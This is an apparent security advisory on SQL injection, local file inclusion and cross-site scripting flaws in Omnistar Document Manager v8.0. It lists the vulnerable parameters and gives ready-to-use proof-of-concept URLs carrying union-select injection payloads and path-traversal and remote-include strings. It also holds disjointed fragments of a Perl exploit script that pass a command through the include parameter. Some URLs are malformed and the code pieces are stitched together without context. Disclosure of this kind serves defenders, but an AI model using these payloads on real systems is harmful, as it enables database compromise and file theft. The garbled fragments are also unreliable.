Multiple SQL Injection Vulnerabilities are detected in Omnistardrives Omnistar Document Manager v8.0 web application.The sql injection vulnerability allows an remote attacker to inject own sql commands/statements on the affected application dbms.The vulnerabilities are detected in the user portal and admin section of the application. The sql vulnerabilities can be exploitation by remote attackers without privileged application user or admin account. The sql bugs are located index.php file with the bound vulnerable report_id, delete_id, add_id, return_to, interface, page & sort_order parameter requests. Successful exploitation of the vulnerabilities results in application dbms compromise & dbms manipulation via sql injection.
A local file include vulnerability is detected in Omnistardrives Omnistar Document Manager v8.0 web application. The vulnerability allows a local privileged user account to include and load local system files. The vulnerability is located in the index module with the bound vulnerable area parameter request. Successful exploitation of the vulnerability results in a web server compromise via file load or information disclosure via local system file include.
Multiple non persistent cross site scripting vulnerabilities are detected in Omnistardrives Omnistar Document Manager v8.0 web application. The vulnerabilities allow remote attackers to hijack administrator/moderator/customer sessions via persistent malicious script code inject on application side. The vulnerabilities are located in the interface exception-handling module of the application with the client side bound vulnerable interface, act, name & alert_msg parameter requests.
Vulnerable Section(s):
[+] /user
[+] /admin
Vulnerable Module(s):
[+] index.php
Vulnerable Parameter(s):
[+] interface
[+] act
[+] name
[+] alert_msg
The sql injection vulnerabilities can be exploited by remote attackers without required user inter action and without privileged application user account. For demonstration or reproduce ...
https://127.0.0.1:1338/[PATH]/index.php?area=main&interface=users&sort_by=1&sort_order=ASC&page=1&return_to= () list&act=report&id=-1' union all select 1,2,3,4,()database,6--
https:/127.0.0.1:1338/[PATH]/index.php?area=main&interface=users&sort_by=1&sort_order=ASC&page=-1%27&return_to= () list&act=list&sort_by=first_name&sort_order=-1' union all select 1,2,3,4,()database,6--
https://127.0.0.1:1338/[PATH]/index.php?area=main&interface=users&sort_by=1&sort_order=ASC&page=1&return_to= () list&act=delete&id=-1' union all select1,2,3,4,()database,6--
https://127.0.0.1:1338/[PATH]/index.php?area=main&interface=users&sort_by=1&sort_order=ASC&page=1&return_to= () list&act=delete&id=-1' union all select1,2,3,4,()database,6--
https://127.0.0.1:1338/[PATH]/index.php?interface=-1' union all select 1,2,3,4,()database,6--&alert_msg=1337
https://127.0.0.1:1338/[PATH]/index.php?area=main&interface=recycle_bin&act=list&sort_by=1&sort_order=ASC&page=-1' union all select 1,2,3,4,()database,6--&return_to=-1' union all select 1,2,3,4,()database,6--
if ($answer =~ /Internal Server Error/) {
print "+ Exploit Failed : ( \n";
print "[+] INTERNEL ERROR! Check out your Ressources";
exit();
}
break;
}
close($sock);
The local file include vulnerability can be exploited by local low privileged user account without required user inter action.
For demonstration or reproduce ...
https://127.0.0.1:1338/[PATH]/index.php?area=../../[LOCAL FILE INCLUDE VULNERABILITY!]/&..
https://127.0.0.1:1338/[PATH]/index.php?area=http://[LOCAL FILE INCLUDE VULNERABILITY!]&..
$xpl = LWP::UserAgent->new() or die;
$req = HTTP::Request->new(GET =>$Path.'[INCLUDE PATH HERE!]/index.php?area='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die
"\nCould Not connect\n";
1.3
The client side cross site scripting vulnerabilities can be exploited by remote attackers without required application user account and with low or medium user inter action by an administrator/moderator/customer. For demonstration or reproduce ...